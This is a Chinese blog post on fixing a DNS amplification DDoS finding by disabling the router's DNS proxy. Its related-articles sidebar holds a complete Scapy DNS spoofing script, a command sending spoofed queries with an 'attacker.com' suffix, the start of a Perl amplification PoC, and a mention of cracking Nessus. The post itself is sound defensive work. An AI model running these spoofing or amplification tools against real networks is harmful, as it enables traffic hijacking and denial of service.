【DNS Server Spoofed Request Amplification DDoS漏洞修复】

最新推荐文章于 2024-07-19 16:12:11 发布
最新推荐文章于 2024-07-19 16:12:11 发布
阅读量881 收藏 9
点赞数 8
分类专栏: 漏洞修复 文章标签: ddos 网络安全 web安全 安全 漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/135477038
版权

文章目录

前言

之前对公司服务器做漏洞扫描,发现扫描工具提示存在这样一个漏洞,本来觉得漏洞利用率低,而且扫描百度,QQ等网站也会有此漏洞,主要是找了很久资料也不知道如何修复,所以暂未处理。但是近期由于一些原因不得不处理,好在找到了问题所在,故分享一下。

一、漏洞描述

远程DNS服务器响应任何请求。可以查询根区域('.')的名称服务器(NS),得到比原始请求更大的答案。通过欺骗源IP地址,远程攻击者可以利用这种“放大”对使用远程DNS服务器的第三方主机发起拒绝服务攻击。

二、修复措施

最终在深信服技术支持官网中找到了案例

参考文章:托管云-深信服技术支持

漏洞产生根本原因:出口路由器启动了DNS代理功能

解决方案:关闭出口路由器DNS代理功能即可,一般是在AD设备上面。

关闭后重新扫描未报出漏洞,问题解决。

一纸-荒芜
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞扫描神器:Nessus 保姆级教程(附破解步骤)
Flag少侠的博客
05-03 5575
Nessus是一款广泛使用的网络漏洞扫描工具,用于发现和评估计算机系统和网络中的安全漏洞。它是一款功能强大的商业工具,由Tenable Network Security开发和维护。以下是Nessus的一些主要特点和功能:1. 漏洞扫描:Nessus可以自动扫描目标系统和网络,识别存在的安全漏洞。它支持多种扫描策略和技术,包括远程扫描、本地扫描、主动扫描、被动扫描等。2. 综合漏洞数据库:Nessus配备了一个庞大的漏洞数据库,其中包含了数千种已知的漏洞和安全问题。
DNS攻击防范科普系列2》 -DNS服务器怎么防DDoS攻击
xt1233的博客
10-16 351
在上个系列《你的DNS服务真的安全么?》里我们介绍了DNS服务器常见的攻击场景,看完后,你是否对ddos攻击忧心重重?本节我们来告诉你,怎么破局!! 首先回顾一下DDoS攻击的原理。DDoS是Distributed Denial of Service的简称,即分布式拒绝服务攻击,其利用处于不同位置的足够数量的僵尸主机产生数目巨大的数据包对一个或多个目标实施DoS攻击,耗尽受害端的网络带宽、系统资...
DNS攻击详解
weixin_47726676的博客
06-13 9030
目录DNS概念什么是DNS因特网的域名结构DNS域名服务器DNS攻击DDOS攻击基于主机耗尽型的dns查询拒绝服务攻击(DNS query Flooding)攻击方法防御策略基于宽带耗尽型的DNS反弹式拒绝服务攻击(DNS reflector attacks,又称DNS amplification attacks)攻击方法防御策略会话劫持劫持dns服务器地址hosts文件被修改DNS服务器缓存中的映射关系被修改,又称缓存投毒攻击 DNS概念 什么是DNS 域名系统DNS(Domain Name System
一个非常好的反射放大攻击DDoS科普贴
神棍之路
08-06 3317
Amplified reflection attacks are a type of DDoS attack that exploits the connectionless nature of UDPs with spoofed requests to misconfigured open servers on the internet. Amplified reflection at...
Linux DNS服务器故障解决
大鹏
08-18 4246
现在UNIX类操纵系统(UNIX、Linux、BSD)的域名服务器绝大多数都是用BIND来架设的。由于DNS服务器负责域名的解析工作,其重要性不言而喻。如果在Linux网络中无法进行域名解析,很可能是没有在本地指定有效的域名服务器,通常这种情况比较常见。大多数DNS故障是因为配置文件的语法错误,或者是对计算机分配了错误的地址造成的。    Linux中的DNS配置文件   Linux下主要DNS配置文件有以下几个。    /etc/hosts:主机的一个列表文件,包含(本地网络中)已知主机的一个列表。如果
DNS Amplification Attack PoC(DNS放大攻击)
Yatere的天平秤
05-14 5065
#!/usr/bin/perl # Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.21_01.tar.gz # cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well. # P
What Is A DNS Amplification DDoS Attack?
weixin_57062986的博客
09-29 716
域名系统 (DNS) 是用于在网站的机器可读地址(例如 191.168.0.1:80)和人类可读名称(例如 radware.com)之间进行解析的目录在 DNS 放大攻击中,攻击者使用IP 地址欺骗对目标发起反射式 DNS 攻击。
PHP漏洞全解
02-12
6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、Session 固定攻击(Session Fixation) 9、HTTP 响应拆分攻击(HTTP Response Splitting) 10、文件上传漏洞...
SSRF是否有DNSpooq的漏洞
05-05
SSRF(Server-Side Request Forgery)是一种网络安全漏洞,它允许攻击者利用服务器的网络权限发起请求。在SSRF攻击中,攻击者可以控制服务器去访问任何受限制的内部资源,比如读取内部网络服务、攻击内网其他系统...
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection...
4. LAN PC使用命令发送dns query包
05-06
sudo python3 query.py -i <network interface> -s <CPE LAN Gateway> -f spoofed_malicious.txt --suffix x.attacker.com
2024年第二季度 DDoS 威胁趋势报告
m0_70655343的博客
07-18 826
Cloudflare 的自动化防御系统生成了针对 DDoS 攻击的实时特征,并且由于这些复杂攻击的随机性,我们观察到单次攻击生成了许多特征 - 实际生成的特征数量接近 1900 万,比 180 万这个标准化处理后的数字高出十倍以上。所有基于 TCP 的 DDoS 攻击数量总共占网络层 DDoS 攻击总数的 38%。这个排名纳入考虑的攻击类型包括:HTTP DDoS 攻击、网络层 DDoS 攻击、DDoS 攻击流量占总流量的总量和百分比,并且图表显示了每个国家或地区的总体 DDoS 攻击活动。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 218
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
用AI对抗AI:Fortinet解锁家电制造网络安全新密码
最新发布
Fortinet_CHINA的博客
07-19 717
Fortinet盛大启幕《构筑垂直行业 网络安全防线》系列研讨会。Fortinet中国南区资深安全顾问黄志攀深入洞察家电制造行业的网络安全挑战,全面解析了Fortinet如何通过全栈AI技术重塑OT安全解决方案,以应对复杂多变的威胁环境。家电制造行业网络安全深度分析家电制造产线的安全现状普遍令人担忧,主要体现在网络架构的两极分化、显著的安全与管理风险、安全区域划分的缺失,以及OT网络面临的直接威胁。
静态IP地址在网络安全中的角色解析与实测分析
2401_85937702的博客
07-19 699
在这个网络边界日益模糊的时代,每一次点击、每一次数据传输都有着安全问题。作为网络安全体系中的基石,静态IP地址的角色显得尤为重要而复杂。今天,我们的测评团队将带您深入剖析静态IP地址在网络安全中的多重角色,并通过两家代理服务商的实测分析,为您揭开其在实际应用中的神秘面纱。
scapy进行dns spoof
05-24
Scapy可以用来进行DNS欺骗攻击,即DNS Spoofing。这种攻击方式会欺骗目标主机的DNS服务器,使其返回虚假的IP地址,从而导致目标主机连接到了攻击者指定的恶意网站。 下面是一个示例代码,可以使用Scapy进行DNS Spoofing: ```python from scapy.all import * def spoof_dns(pkt): if DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode(): # 构造一个虚假的DNS响应包 ip = IP(dst=pkt[IP].src, src=pkt[IP].dst) udp = UDP(dport=pkt[UDP].sport, sport=53) dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata='1.2.3.4')) spoofed_pkt = ip/udp/dns # 发送虚假的DNS响应包 send(spoofed_pkt, verbose=0) # 监听DNS请求包,并对目标主机发送虚假的DNS响应包 sniff(filter='udp port 53', prn=spoof_dns) ``` 在上面的代码中,我们使用Scapy的sniff()函数监听DNS请求包,并对目标主机发送虚假的DNS响应包。需要注意的是,我们需要根据具体情况修改代码中的IP地址、端口号、域名和IP地址等参数。此外,这种攻击方式可能会违反法律规定,使用时需要谨慎。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值